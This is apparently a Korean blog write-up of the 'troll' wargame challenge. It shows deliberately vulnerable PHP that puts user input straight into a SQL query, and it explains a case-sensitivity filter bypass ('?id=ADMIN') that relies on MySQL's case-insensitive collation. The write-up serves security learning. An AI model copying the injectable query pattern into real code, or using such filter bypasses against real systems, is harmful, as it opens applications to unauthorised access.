08. troll

문제 코드

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/\'/i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match("/admin/", $_GET[id])) exit("HeHe");
  $query = "select id from prob_troll where id='{$_GET[id]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id'] == 'admin') solve("troll");
  highlight_file(__FILE__);
?>

따옴표와 admin 문자열을 필터링합니다. 하지만 preg_match("/admin/", ...)에는 i 옵션이 없으므로 대소문자를 구분합니다.

exploit

?id=ADMIN

최종 쿼리는 아래와 같은 형태가 됩니다.

select id from prob_troll where id='ADMIN'

필터는 소문자 admin만 막습니다. 반면 MySQL의 일반적인 문자열 비교는 기본 collation에서 대소문자를 구분하지 않기 때문에 ADMIN도 admin과 같은 값으로 비교됩니다.

Haeyul Blog

Explorer

08. troll

문제 코드

exploit

Graph View

Table of Contents